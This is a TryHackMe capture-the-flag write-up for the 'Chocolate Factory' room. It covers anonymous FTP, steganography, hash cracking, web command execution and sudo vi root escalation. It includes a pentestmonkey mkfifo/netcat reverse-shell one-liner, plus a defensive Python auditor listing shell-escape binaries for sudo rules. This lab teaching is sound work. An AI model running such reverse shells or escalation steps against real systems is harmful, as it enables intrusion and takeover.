Chocolate Factory | THM

A Charlie And The Chocolate Factory themed room, revisit Willy Wonka’s chocolate factory!

Let’s begin this box.
As usual, we start with an nmap scan:


nmap -sV -sC machine_IP

Taking a peek at the nmap scan result, we can see that ports 22, 21, 80 and 100 are open. As mentioned in the scan result, port 21 allows anonymous login, so we proceed with enumeration on that port.

++FTP Enumeration++

Logging in to FTP with anonymous as both the username and the password,
we find a PNG image. I’m curious whether this is some type of steganography.
Let’s find out, so I downloaded the image to my local machine:

get file_name.png /local directory/filename.png

Getting the file from FTP using the get command

Let’s analyze the obtained file

This looks like an image of chewing gum. It’s always a good habit to look into an image file, since you don’t know what may be hidden inside. We can use steghide or any other tool of your choice; I have selected Steghide and am going to proceed with it.
C’mon, let’s reveal the hidden data.


steghide extract -sf file_name

Voila, as soon as I pressed Enter without any password, it was accepted.
Looking further into the obtained file, yeah, this is a base64 hash. Now we decode it and find what information it holds. Here we can use CyberChef to decode the base64.

We got the /etc/passwd file.

Now we need to decrypt the hash, so here I’m going to use hashcat to decrypt the given hash and get the password for user charlie.

Now we have a username and password, so head to the machine’s web page, where you’re greeted with this login page:

Enter your credentials and proceed

Here we can see that command execution can be performed.

If my ‘ls’ command is working, why not try other commands? Proceeding further, I just noticed a key file and submitted it as the answer to the related question.
So, commands are working; then why not proceed with a reverse shell?
At the same time, we set up netcat to listen for the reverse connection.
Here we go...


This reverse shell script was taken from pentestmonkey:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

After setting the port and machine_ip in netcat and the reverse shell script,
we got a shell... hooray!


We don’t have permission to open the file.

Exploring each file in the directory:

We got hold of an id_rsa key.

Using this key, we log in as the given user.



To check the permissions, we type sudo -l. Here we find that this particular user can execute “/user/bin/vi”.

I decided to take a look at GTFOBins for an escalation method.

Voila, I’m root. Now we can cat root.txt, and we got our flag:
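
From the defender's side, the finding at the sudo -l step is a sudoers rule that lets a user run an editor with elevated rights. The added example below (not part of the original write-up) audits `sudo -l` output for such rules; the sample output, the user name appuser and the list of binaries are constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Programs with a documented shell escape (small subset of the GTFOBins "sudo" list).
SHELL_ESCAPE = {"vi", "vim", "view", "less", "more", "man", "nano", "ed",
                "awk", "find", "python", "python3", "perl", "ruby", "env"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")  # "(runas) commands"
TAG = re.compile(r"^(?P<tag>[A-Z_]+):\s*")                      # NOPASSWD:, NOEXEC:, ...

# Constructed sample of `sudo -l` output (not taken from the room).
SAMPLE = """\
Matching Defaults entries for appuser on host:
    env_reset, mail_badpass

User appuser may run the following commands on host:
    (root) NOPASSWD: /usr/bin/vi
    (root) NOEXEC: /usr/bin/less /var/log/syslog, /usr/sbin/service nginx reload
    (root) /usr/bin/find
"""

def audit_sudo_l(text):
    """Return (runas, command, reason) for every entry that hands out a shell."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas, tags = m.group("runas").strip(), set()
        for cmd in (c.strip() for c in m.group("rest").split(",")):
            # Tags apply to the commands that follow them; an opposite tag overrides.
            while (t := TAG.match(cmd)):
                tag = t.group("tag")
                tags.discard("NO" + tag)
                tags.discard(tag.removeprefix("NO"))
                tags.add(tag)
                cmd = cmd[t.end():]
            if not cmd:
                continue
            binary = cmd.split()[0]
            name = PurePosixPath(binary).name
            if binary == "ALL":
                reason = "unrestricted command set"
            elif name in SHELL_ESCAPE and "NOEXEC" not in tags:
                # NOEXEC stops a dynamically linked program from executing others.
                reason = f"{name} can spawn a shell as the run-as user"
            else:
                continue
            if "NOPASSWD" in tags:
                reason += " (no password required)"
            findings.append((runas, cmd, reason))
    return findings
```

Where the goal is only to let a user edit a root-owned file, a `sudoedit` rule is the safer grant, because the editor then runs as the invoking user on a temporary copy.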



Executing it with python, it prompts with “Enter the key”.
As soon as we enter the obtained key, it gives us the flag.

Finally, it’s pwned and we obtained the desired flag.
Revisiting Willy Wonka’s Chocolate Factory and meeting the Oompa Loompas was nice. This was an easy box that includes all the entry-level techniques.
Thanks for reading.




security researcher
